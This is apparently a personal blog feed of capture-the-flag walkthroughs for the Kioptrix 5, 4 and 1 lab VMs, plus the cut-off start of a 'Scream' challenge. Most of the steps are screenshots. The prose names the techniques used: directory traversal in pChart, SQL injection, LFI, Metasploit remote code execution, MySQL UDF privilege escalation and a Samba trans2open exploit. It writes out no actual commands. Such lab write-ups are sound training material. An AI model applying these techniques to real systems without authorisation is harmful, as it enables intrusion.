<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMakUcKn3eH4LnxtnuwrM8PihEbt_M-jlK9hTU-NafUha7OtUEtuTqmpzXRTRTPCcWLo6bQd6fQ_9kUCTN6Wz5y2L8dijy8yUfR7OXexjWtJRpnZImrPhITGEvHTjlstdQkOliqGlZVc/s1600/mike.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMakUcKn3eH4LnxtnuwrM8PihEbt_M-jlK9hTU-NafUha7OtUEtuTqmpzXRTRTPCcWLo6bQd6fQ_9kUCTN6Wz5y2L8dijy8yUfR7OXexjWtJRpnZImrPhITGEvHTjlstdQkOliqGlZVc/s1600/mike.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good. TRY HARDER!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4r3tua0Wws3dMJRQTscp8qxYx7R1JB0GBITRhYZacGvOoctv68Ya0vdtKtumSxiDczRliipK3ti1waT7nNNvWirk7uHCCHl1oyWicgdVrhDBsPNFZ4ziBvM5vyqBpzvwBd3B8ZXrDGHY/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4r3tua0Wws3dMJRQTscp8qxYx7R1JB0GBITRhYZacGvOoctv68Ya0vdtKtumSxiDczRliipK3ti1waT7nNNvWirk7uHCCHl1oyWicgdVrhDBsPNFZ4ziBvM5vyqBpzvwBd3B8ZXrDGHY/s1600/root.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over!rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-16387058970195151852016-07-22T14:12:00.000+02:002016-07-22T14:12:06.027+02:00Kioptrix 5Hello,<br />
Now it's turn to the last (unfortunately) Kioptrix challenge.<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpJqkLDkiOkMI8P3zx17TpXDn7rKXCJqqIZIU-jIKArjzU9Z_Eu0gy__B-C1Nz6mJSH5ZdMp9Tw8ApbNVDX3QElz9_EGZsvRVeR8UxmyjPmIPV0_B1JwGShCRrmvYzx3Yj-56e3hS5Tuw/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpJqkLDkiOkMI8P3zx17TpXDn7rKXCJqqIZIU-jIKArjzU9Z_Eu0gy__B-C1Nz6mJSH5ZdMp9Tw8ApbNVDX3QElz9_EGZsvRVeR8UxmyjPmIPV0_B1JwGShCRrmvYzx3Yj-56e3hS5Tuw/s1600/nmap.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Two open ports? It suits me.<br />
Let's begin our travel from port 80. Default web page is a default page for Apache - <b>It works</b>, but source code contains good news for us.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ_jzyg0na5EHhPK4NlFD4j0xNvgUWT8dVcngcZuiYVLnoYtHfe1_dsGnhyrfyy0s7LGnrrXu9X6ljX3oc-Ok1XG4cJVFHDYSj0dH_ljIxXHF00poeF0eMGGBLhxwGIWsEIpC4QneSzJA/s1600/source.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ_jzyg0na5EHhPK4NlFD4j0xNvgUWT8dVcngcZuiYVLnoYtHfe1_dsGnhyrfyy0s7LGnrrXu9X6ljX3oc-Ok1XG4cJVFHDYSj0dH_ljIxXHF00poeF0eMGGBLhxwGIWsEIpC4QneSzJA/s1600/source.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, there is pChart, that's good for us, because it contains multiple vulnerabilities.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5tYEoPfWbU9kverHRkM0TD6fhvxGY5NOjmJkOsGuxFbNvXjekpyPPQ8uhmAViVcetZhzBOPx5BoIVZHRApVTqz19oFkpEeCTqH45_VTlUSlcVY6rFJ7MbhVdfY0gLH3W239sTHM7ql40/s1600/pchart.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5tYEoPfWbU9kverHRkM0TD6fhvxGY5NOjmJkOsGuxFbNvXjekpyPPQ8uhmAViVcetZhzBOPx5BoIVZHRApVTqz19oFkpEeCTqH45_VTlUSlcVY6rFJ7MbhVdfY0gLH3W239sTHM7ql40/s1600/pchart.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, let's try exploit Directory Traversal vulnerability.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZM70VGSQOyAHdaLDoTa03In4kK8ipXnxFfBsuALaX_kjbQRfoQR_T6ww2nFkheE1cTZvW-VFGvJ9hOExKPLyg2hazzSkD3f0J9hVDVL5Fs3_SaqY0_l-fMT0o9i_3cSkaCDTKLiFbuc/s1600/passwd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZM70VGSQOyAHdaLDoTa03In4kK8ipXnxFfBsuALaX_kjbQRfoQR_T6ww2nFkheE1cTZvW-VFGvJ9hOExKPLyg2hazzSkD3f0J9hVDVL5Fs3_SaqY0_l-fMT0o9i_3cSkaCDTKLiFbuc/s1600/passwd.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! Let's try find Document Root file for apache.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Y_uQab-WVJRNgMuMizJmBIrGWjYR9jlmJbTIubrRALseW0hYwo4e_C0hsLDSIVm4T0NS9ghgBBYRS4D1gpu89PXUgQ9oFl3VXEqYYpUl8b1Qf5N7epfvYi1Ht7mX0E5JaoIAO_MLMmk/s1600/conf.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="623" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Y_uQab-WVJRNgMuMizJmBIrGWjYR9jlmJbTIubrRALseW0hYwo4e_C0hsLDSIVm4T0NS9ghgBBYRS4D1gpu89PXUgQ9oFl3VXEqYYpUl8b1Qf5N7epfvYi1Ht7mX0E5JaoIAO_MLMmk/s640/conf.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
What do you think about it? I have changed User Agent using Burp Suite and I have got on port 8080<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcfMA46hXOuVs-6IhzLIRg1MCnEO0S7qtTpMFNVvPrELUVx34kvCGRtLcNS6EeuZsNbFlDxPq-p_scAXELrMrc8sOzq7T-eeuC-K7lV3LLBjU9nAsyos04gkrZQNdZXLzUnsX6xvusK8/s1600/forbid.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcfMA46hXOuVs-6IhzLIRg1MCnEO0S7qtTpMFNVvPrELUVx34kvCGRtLcNS6EeuZsNbFlDxPq-p_scAXELrMrc8sOzq7T-eeuC-K7lV3LLBjU9nAsyos04gkrZQNdZXLzUnsX6xvusK8/s1600/forbid.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I have clicked on it<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1be2wIehoP3kXwLdJ4aEOJDnmWWSWO4D_WhNi0HyNR2BZKC8c8uIQz-jXcQrC1qeaUpsxTWYCBfVRYi5ntJ-d31OMrJgnqMwxKVRYJnWEAtW6x4zOH5Ryd0g-rPAVyYgh4VqePM__U4/s1600/tax.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="605" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1be2wIehoP3kXwLdJ4aEOJDnmWWSWO4D_WhNi0HyNR2BZKC8c8uIQz-jXcQrC1qeaUpsxTWYCBfVRYi5ntJ-d31OMrJgnqMwxKVRYJnWEAtW6x4zOH5Ryd0g-rPAVyYgh4VqePM__U4/s640/tax.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm I don't know how to exploit it.... But quick research and we can use Remote Code Execution!<br />
I have used Metasploit Framework and I have got limited shell!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnvsKO6FAQfmsL6BejQkJrplP3nb-7PYaZPOl3ncnqwCPewUzbrPt7a4_TILx1dx7CuNekR4-hdFM3s_9VzTqgwq8yVHNt01SkwSVBmppvB-r2UoGjmrYXyf6hbGL1sLpFaSQsts8BIAA/s1600/Screenshot+from+2016-07-22+08-05-23.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnvsKO6FAQfmsL6BejQkJrplP3nb-7PYaZPOl3ncnqwCPewUzbrPt7a4_TILx1dx7CuNekR4-hdFM3s_9VzTqgwq8yVHNt01SkwSVBmppvB-r2UoGjmrYXyf6hbGL1sLpFaSQsts8BIAA/s640/Screenshot+from+2016-07-22+08-05-23.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, now it's time to escalate our privileges.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDcx63388VqPVMPuz7Hk-wVkt0NhpifuTLiL6yi9Ygw5wbgIPShsf_biXdQuUMQZXVRzvJxaQ5Cd8HeaIRP0xGEMrIPZ8If27NhYhaRTtgxGIyThR6K1PHJVWBs8jnCKrNvViYqahzl_U/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDcx63388VqPVMPuz7Hk-wVkt0NhpifuTLiL6yi9Ygw5wbgIPShsf_biXdQuUMQZXVRzvJxaQ5Cd8HeaIRP0xGEMrIPZ8If27NhYhaRTtgxGIyThR6K1PHJVWBs8jnCKrNvViYqahzl_U/s1600/root.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over! <br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-89006012682075169072016-07-22T10:03:00.003+02:002016-07-22T10:29:55.124+02:00Kioptrix 4Hello,<br />
We know Kioptrix (one of my favourite) challenges, isn;t it? We resolved the first three, so now it is the turn for fourth.<br />
<br />
Scanning without aggressive mode :)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0oi-5lm9LmVNlQ7gdFLIfHLGlh5_N5F0YpGgSxQ-nZKDUnE49NIMwAq7cgqcSos-dXbvS5W-GKodPSVh9EKvuf6VOPXLIEGg98ur3lXmNvJUJUBAoxBNDCQy0dbgd3sZkyZd7Vf5Nd1U/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0oi-5lm9LmVNlQ7gdFLIfHLGlh5_N5F0YpGgSxQ-nZKDUnE49NIMwAq7cgqcSos-dXbvS5W-GKodPSVh9EKvuf6VOPXLIEGg98ur3lXmNvJUJUBAoxBNDCQy0dbgd3sZkyZd7Vf5Nd1U/s1600/nmap.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, four open ports.Let's start from web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9X45JIBemLY4wCcLt8FPD5Pqo3B2y_e2_mHIpbeoeP7_b3Nvb5aZdytRv46WOVeZR2iHcavX51SwPhIVPxS-N7b-NF0extwvh_UQ6dq-nEuq2TbgPOuSrostqm6zAzscUXpN75aa8Cco/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9X45JIBemLY4wCcLt8FPD5Pqo3B2y_e2_mHIpbeoeP7_b3Nvb5aZdytRv46WOVeZR2iHcavX51SwPhIVPxS-N7b-NF0extwvh_UQ6dq-nEuq2TbgPOuSrostqm6zAzscUXpN75aa8Cco/s1600/web.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice, maybe it is opportunity to conduct SQL Injection attack? So, indeed there is SQLi vulnerability<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zNfMAJcKCboCV7LlQPDViKwwpRS4QtWArcCyK4-R2zOqHki8HeH0AhIgGigJOY6rNAQWfOmISjP8VHx5-4RJ14C7Ij_KwHWIQbJ991Wdsfs45wbS37PPyVqWN1liuBEoAExuYrha_rY/s1600/user.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zNfMAJcKCboCV7LlQPDViKwwpRS4QtWArcCyK4-R2zOqHki8HeH0AhIgGigJOY6rNAQWfOmISjP8VHx5-4RJ14C7Ij_KwHWIQbJ991Wdsfs45wbS37PPyVqWN1liuBEoAExuYrha_rY/s1600/user.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We can use sqlmap but let's penetrate manually further. I run dirb<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGcEvD4cpe1CI7X_d8Ra9KlirLgpzR9EfDuED9Uq5NKcBsUHSH3McHiD-dm14miCcnOW-92cF4bab1wbc_OxOYYgEzPYI-JtzHRtz5eewbIsBIrF4dzg_W4hrc2Mq-n4Sr1rFq7AQUU-U/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGcEvD4cpe1CI7X_d8Ra9KlirLgpzR9EfDuED9Uq5NKcBsUHSH3McHiD-dm14miCcnOW-92cF4bab1wbc_OxOYYgEzPYI-JtzHRtz5eewbIsBIrF4dzg_W4hrc2Mq-n4Sr1rFq7AQUU-U/s1600/dirb.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We can see <b>/john</b> directory - I have browsed it and there is <b>john.php</b> file, but unfortunately executing it I achieved nothing.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZyGBpZfWi1abJcJ8S6oYmFRsRJBE6cHro_fDATkQyPFxIvWNvllzK9W0sJtS0SYRl8GcLrmNw3k3-PIG6n_e_7Ja-1G_SnX9TCrvTlyjg9cnL3Uq7IrI3opHIryzp_JiFyAP2bSo9V0/s1600/lfi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZyGBpZfWi1abJcJ8S6oYmFRsRJBE6cHro_fDATkQyPFxIvWNvllzK9W0sJtS0SYRl8GcLrmNw3k3-PIG6n_e_7Ja-1G_SnX9TCrvTlyjg9cnL3Uq7IrI3opHIryzp_JiFyAP2bSo9V0/s1600/lfi.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, look at this! LFI? But let's come back to SQLi.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCpLUW61OmqjCy6b_GOHjZxJm453EAc4AjQ_9EBJvGc-siQlDCp9SMtGSH-2A6QazC60ghB6-mh4AC5z3xMio3a0ZJSKTv4wzpDh83kzsgxRIAjSn62qANbRwDjlhs-ry0dWEIledypcg/s1600/mysql.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCpLUW61OmqjCy6b_GOHjZxJm453EAc4AjQ_9EBJvGc-siQlDCp9SMtGSH-2A6QazC60ghB6-mh4AC5z3xMio3a0ZJSKTv4wzpDh83kzsgxRIAjSn62qANbRwDjlhs-ry0dWEIledypcg/s1600/mysql.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Great! Let's go deeper<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sN8gyBywBHJIP1_hCO196avtVulc7nauLk38qA7KIgrwI-Pfu7KwUoTk-aHQOMxiPxgYUzwqrSyR9h0V1B8FKBlf5fB-5jUTiFMXDU7aa-4ihVRvbCSOxvNneIxKml3UdXzDkdOw3sI/s1600/user.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sN8gyBywBHJIP1_hCO196avtVulc7nauLk38qA7KIgrwI-Pfu7KwUoTk-aHQOMxiPxgYUzwqrSyR9h0V1B8FKBlf5fB-5jUTiFMXDU7aa-4ihVRvbCSOxvNneIxKml3UdXzDkdOw3sI/s1600/user.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Awesome, we have got credentials! So let's try log in via SSH<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJdOlyPPvz0gfoB0FzyVkBIx0oS6JO7D3EVZtlEDWICzFgxXh07V6jPhDwsWfKr9SOm2ZnZJUm3Lg3c-JBzXvukN9AyjkB4mQoG6vXhHLJ4mV7GOx7taXWDZFq-DZpV5-TgyUJEWVxLfg/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJdOlyPPvz0gfoB0FzyVkBIx0oS6JO7D3EVZtlEDWICzFgxXh07V6jPhDwsWfKr9SOm2ZnZJUm3Lg3c-JBzXvukN9AyjkB4mQoG6vXhHLJ4mV7GOx7taXWDZFq-DZpV5-TgyUJEWVxLfg/s1600/ssh.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good, but we have limited access to shell. It is very helpful https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/<br />
Wow!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlT4G-L4jHgfDaKvFig1k-k6ZVnLvPKuWq5H8EM_QwX2gUgtjK-2td0JHVG_oFN48PXnNPPJC66RIDdinDiG0Q03ENy04gTXy6YBYe3UZUNqxMlPjmJMjGvTLASV5kUH8JITx76AEzbos/s1600/game.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlT4G-L4jHgfDaKvFig1k-k6ZVnLvPKuWq5H8EM_QwX2gUgtjK-2td0JHVG_oFN48PXnNPPJC66RIDdinDiG0Q03ENy04gTXy6YBYe3UZUNqxMlPjmJMjGvTLASV5kUH8JITx76AEzbos/s1600/game.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Are you surprised? I am! But we can't connect to our attacker machine from the target using i.e wget. Probably firewall block the traffic. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5rGmuCw4uVylmz3PO08-tb1tiaNc_xzLmI3vroQdE5c_QqKTOI4gPvYza118ev1fG9Izh5uyKbMtgnrGnsLLiPU4PO8VCSiRCjJeRUfqvBe-R8CKKqtEQFAJjXhj9GyDstKwllvIWfs/s1600/shadow.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5rGmuCw4uVylmz3PO08-tb1tiaNc_xzLmI3vroQdE5c_QqKTOI4gPvYza118ev1fG9Izh5uyKbMtgnrGnsLLiPU4PO8VCSiRCjJeRUfqvBe-R8CKKqtEQFAJjXhj9GyDstKwllvIWfs/s1600/shadow.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Exellent! We are able to exploit UDF - http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/<br />
<br />
So, I have changed iptables rules to accept all inbound and outbound traffic. Now we can download local root exploit, but we are clever and we don't need exploit to get root privileges.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_35Q8dViQBq_-QYfIajM05oDtQ-cXEmPGfA4tnyVLsZzy154TdlxwqRhE18TABIXNyHhdHM_p8qQmfeB7UISXI6fOlKAV1XXOHWdp5YJez3nIlS9Wx1aeInEYKu5OVvAql8XtmcJobY/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_35Q8dViQBq_-QYfIajM05oDtQ-cXEmPGfA4tnyVLsZzy154TdlxwqRhE18TABIXNyHhdHM_p8qQmfeB7UISXI6fOlKAV1XXOHWdp5YJez3nIlS9Wx1aeInEYKu5OVvAql8XtmcJobY/s640/root.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game overrgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-25503743339353146672016-07-20T23:03:00.000+02:002016-07-20T23:03:07.586+02:00Kioptrix 1Hello,<br />
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.<br />
<br />
I have run nmap scanning all ports.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXZ2bDwHw2tJGPHQsO659IhGnZjieH20SgWTILmxFk6rKoLz9-OizrZK-NlUPHmoun2WwP6MxwPYlqHBBErVWZdkYJH4I2zQfxn7eZHKEOk5fo8lmuFysKNyS6fr2DKcMmHAvr7oYKbFM/s1600/scan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXZ2bDwHw2tJGPHQsO659IhGnZjieH20SgWTILmxFk6rKoLz9-OizrZK-NlUPHmoun2WwP6MxwPYlqHBBErVWZdkYJH4I2zQfxn7eZHKEOk5fo8lmuFysKNyS6fr2DKcMmHAvr7oYKbFM/s1600/scan.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, OpenSSH and Apache are so old. Let's try find suitable exploit for them. BINGO! Openfuck should be suitable for Apache 1.3.20. Ups... It doesn't work...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYIdR8QjofG5mNELL4-6Y1mqqu29MldBskt_7gUN-UhLZZuhHGiyMZ1VlZinVL5y5aaix6GU3KqXpYNkbm57tghYgyKxhrZ3vmDZjBFENNrtHI-ogBlkaQCJAqlYiVGMTYBxIb5ItbTJ0/s1600/open.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYIdR8QjofG5mNELL4-6Y1mqqu29MldBskt_7gUN-UhLZZuhHGiyMZ1VlZinVL5y5aaix6GU3KqXpYNkbm57tghYgyKxhrZ3vmDZjBFENNrtHI-ogBlkaQCJAqlYiVGMTYBxIb5ItbTJ0/s1600/open.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Surprise... Hmm, we have to looking for suitable exploit further.<br />
We can use Metasploit and <b>trans2open</b> exploit for Samba on our target. When we run the exploit we will get <b>root</b> directly.<br />
<br />
Game Over!rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-32302675796107196682016-07-19T21:05:00.000+02:002016-07-19T21:07:45.794+02:00Scream challengeHello,<br />
<br />
This challenge is a Windows XP vulnerable machine. Thank for g0tm1lk for preparation the challenge.<br />
<br />
Scanning with aggressive mode all ports TCP.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkveEEBdH1EgCARCpkJwzAhdjUuo-Dq_CJlBRSwbiH5K_B2QSexDHdfwxCAp0m_qhPIUEOUhiPrNgzSfOIpFoCTqgiFBnHqq0E5xz3sDmhBO2Ll0zwFqPfN3ZZ8okyGwu9kOm-Pov2VRE/s1600/scan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkveEEBdH1EgCARCpkJwzAhdjUuo-Dq_CJlBRSwbiH5K_B2QSexDHdfwxCAp0m_qhPIUEOUhiPrNgzSfOIpFoCTqgiFBnHqq0E5xz3sDmhBO2Ll0zwFqPfN3ZZ8okyGwu9kOm-Pov2VRE/s1600/scan.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we know what kind of services serves our target. To be honest I am a little surprised, only four open ports for Windows is a good result. We can see that we are able to log in to FTP as a anonymous user. As far as I know FTP version has assigned public known Buffer Overflow exploit.<br />
In spite of fact that we can log in as anonymous, let's browse a web application.<br />
<div class="separator" style="clear: both; text-align: center;">
